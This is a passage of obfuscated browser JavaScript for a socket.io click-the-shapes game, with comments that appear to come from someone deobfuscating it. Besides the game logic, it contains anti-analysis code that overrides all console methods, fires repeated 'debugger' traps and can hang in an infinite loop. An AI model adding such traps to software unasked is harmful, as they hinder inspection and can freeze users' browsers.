    var _0x2386f1 = _0x16f724();
    if (!_0x2386f1['console']) {
        _0x2386f1['console'] = function(_0x368eaa) {
            var _0x95093c = ["2", "5", "9", "8", "1", "6", "7", "0", "4", "3"];
            var _0x495f14 = 0x0;
            while (true) {
                switch (_0x95093c[_0x495f14++]) { //iterate throught this
                case '0':
                    _0xd80574["table"] = _0x368eaa;
                    continue;
                case '1':
                    _0xd80574["info"] = _0x368eaa;
                    continue;
                case '2':
                    var _0xd80574 = {};
                    continue;
                case '3':
                    return _0xd80574;
                case '4':
                    _0xd80574['trace'] = _0x368eaa;
                    continue;
                case '5':
                    _0xd80574["log"] = _0x368eaa;
                    continue;
                case '6':
                    _0xd80574["error"] = _0x368eaa;
                    continue;
                case '7':
                    _0xd80574["exception"] = _0x368eaa;
                    continue;
                case '8':
                    _0xd80574['debug'] = _0x368eaa;
                    continue;
                case '9':
                    _0xd80574["warn"] = _0x368eaa;
                    continue;
                }
                break;
            }
        }(_0x5a2bbc);
    } else {
        if (true) {
            var _0xd32090 = ["4", "1", "5", "7", "6", "3", "2", "0"];
            var _0x64c580 = 0x0;
            while (true) {
                switch (_0xd32090[_0x64c580++]) {//iterate through this using list
                case '0':
                    _0x2386f1['console']['trace'] = _0x5a2bbc;
                    continue;
                case '1':
                    _0x2386f1['console']["warn"] = _0x5a2bbc;
                    continue;
                case '2':
                    _0x2386f1['console']["table"] = _0x5a2bbc;
                    continue;
                case '3':
                    _0x2386f1['console']["exception"] = _0x5a2bbc;
                    continue;
                case '4':
                    _0x2386f1['console']["log"] = _0x5a2bbc;
                    continue;
                case '5':
                    _0x2386f1['console']["debug"] = _0x5a2bbc;
                    continue;
                case '6':
                    _0x2386f1['console']["error"] = _0x5a2bbc;
                    continue;
                case '7':
                    _0x2386f1['console']["info"] = _0x5a2bbc;
                    continue;
                }
                break;
            }
        } else {
            var _0x3e1b1b = test['constructor']("return /" + this + "/")()['compile']("^([^ ]+( +[^ ]+)+)+[^ ]}");
            return !_0x3e1b1b["test"](_0x27dfce);
        }
    }
});
_0x45c586();
var socket = io();
var bStart = document['getElementById']('bStart');
var cGame = document['getElementById']('cGame');
var pScore = document['getElementById']('pScore');
var score = 0x0;
var msg = '';
var shapes = [];
var ctx = cGame['getContext']('2d');
function update() {
    pScore['innerHTML'] = 'Score: ' + score + (msg ? ',\x20' : '') + msg;
}
function drawShapes() {
    ctx["clearRect"](0x0, 0x0, 0x1f4, 0x12c);
    shapes['map'](
        (_0x401a13,_0x53031c)=>_0x53031c ? ctx["fillRect"](_0x401a13['x'] - 0x5, _0x401a13['y'] - 0x5, 0xa, 0xa) 
        : ctx['beginPath']() + ctx["arc"](_0x401a13['x'], _0x401a13['y'], 0x5, 0x0, Math['PI'] * 0x2) + ctx["closePath"]() + ctx["fill"]()
        );
}
function getCursorPosition(_0x2b237a, _0x380ec8) {
    var _0x127ab4 = {
        'NhgpB': function(_0x3d88ae, _0x1d8777) {
            return _0x3d88ae - _0x1d8777;
        }
    };
    const _0x17e5d8 = _0x2b237a['getBoundingClientRect']();
    const _0x4a40e = _0x380ec8['clientX'] - _0x17e5d8['left'];//90.5
    const _0x1efa5e = _0x380ec8['clientY'] -  _0x17e5d8['top'];//246.96875
    return [_0x4a40e, _0x1efa5e];
}
bStart['addEventListener']('click', function() {
    var _0x1cd630 = {
        'GYjuS': "start"
    };
    socket['emit']("start");
});
socket['on']('disconnect', function() {
    var _0xf6eed5 = {
        'nKIjv': 'You\x20have\x20been\x20disconnected.',
        'dUhjz': function(_0x3ebbbf) {
            return _0x3ebbbf();
        }
    };
    msg = 'You\x20have\x20been\x20disconnected.';
    update();
});
socket['on']('score', function(_0x3576f2) {
    score = _0x3576f2;
    update();
});
socket['on']('disp', function(_0x522d36) {
    var _0x1fe455 = {
        'JPNpV': function(_0x31be72) {
            return _0x31be72();
        }
    };
    msg = _0x522d36;
    update();
});
socket['on']('shapes', function(_0x327b9d) {
    var _0x312e90 = {
        'NsgvL': function(_0x2c843a) {
            return _0x2c843a();
        }
    };
    shapes = _0x327b9d;
    drawShapes();
});
ctx['fillStyle'] = '#ff0000';
cGame['addEventListener']('click', function(mousedata) {
    var _0x3c1dc7 = {
        'CfuWJ': function(_0x5ea446, _0x41976a, _0x3e4576) {
            return _0x5ea446(_0x41976a, _0x3e4576);
        }
    };
    var _0x2f570f = getCursorPosition( cGame, mousedata);
    socket['emit']('click', _0x2f570f[0x0], _0x2f570f[0x1]);
});
function _0x2d1069(_0x36830f) {
    var _0x30ad20 = {
        'VStLo': 'HDgHF',
        'owlBu': function(_0x368ec1, _0xc0219e) {
            return _0x368ec1 === _0xc0219e;
        },
        'BiQoV': 'kfODI',
        'BVgPB': 'string',
        'EPpzm': 'AfAOS',
        'pXPFL': 'QrXhj',
        'aJAlu': "counter",
        'wyIUP': function(_0x117ee9, _0xdaeb77) {
            return _0x117ee9 + _0xdaeb77;
        },
        'XVQSP': function(_0x3c2d14, _0x47006) {
            return _0x3c2d14 / _0x47006;
        },
        'nVazA': 'length',
        'obezh': function(_0x19cb7e, _0x71f6ca) {
            return _0x19cb7e % _0x71f6ca;
        },
        'EJhsO': 'gger',
        'RHjXe': 'action',
        'PKkBh': function(_0x33e933, _0x115743) {
            return _0x33e933 !== _0x115743;
        },
        'vBfjr': 'ewwaA',
        'WvICz': 'xcJlq',
        'pxtCf': 'debu',
        'OZmQc': function(_0xdb7a71, _0x5eafb1) {
            return _0xdb7a71(_0x5eafb1);
        },
        'BfCJM': function(_0x2f3450) {
            return _0x2f3450();
        },
        'BQPaR': 'vQRtE'
    };
    function _0x17b7f6(_0x23c200) {
        if (typeof _0x23c200 === 'string') {//checks if string but has to be a number  so wont run
            if (false) {
                return !![]; //true
            } else { //actual
                return function(_0x12ba0e) {}
                ["constructor"]("while (true) {}")["apply"]("counter");
            }
        } else {
            if ((_0x23c200 % 0x14) === 0x0) { //checks if divisible by 20
                (function() {
                    if (false) {
                        return ![];
                    } else {
                        return !![]; //true
                    }
                }
                ["constructor"]('debugger')['call']("action"));
            } else {
                if (true) {
                    (function() {
                        if (false) {
                            ctx["clearRect"](0x0, 0x0, 0x1f4, 0x12c);
                            shapes["map"]((_0x16827f,_0x45d640)=>_0x45d640 ? ctx["fillRect"](_0x16827f['x'] - 0x5, _0x16827f['y'] - 0x5, 0xa, 0xa) : ctx["map"]() + ctx["arc"](_0x16827f['x'], _0x16827f['y'], 0x5, 0x0, Math['PI'] * 0x2) + ctx["closePath"]() + ctx["fill"]());
                        } else {
                            return ![]; //false
                        }
                    }
                    ["constructor"]("debugger")["apply"]('stateObject'));
                } else {
                    return _0x17b7f6;
                }
            }
        }
        _0x17b7f6(++_0x23c200);
    }
    try {
        if (_0x36830f) {
            if (true) {
                return _0x17b7f6;
            } else {
                score = sc;
                update();
            }
        } else {
            _0x17b7f6(0x0);
        }
    } catch (_0x1185a1) {}
}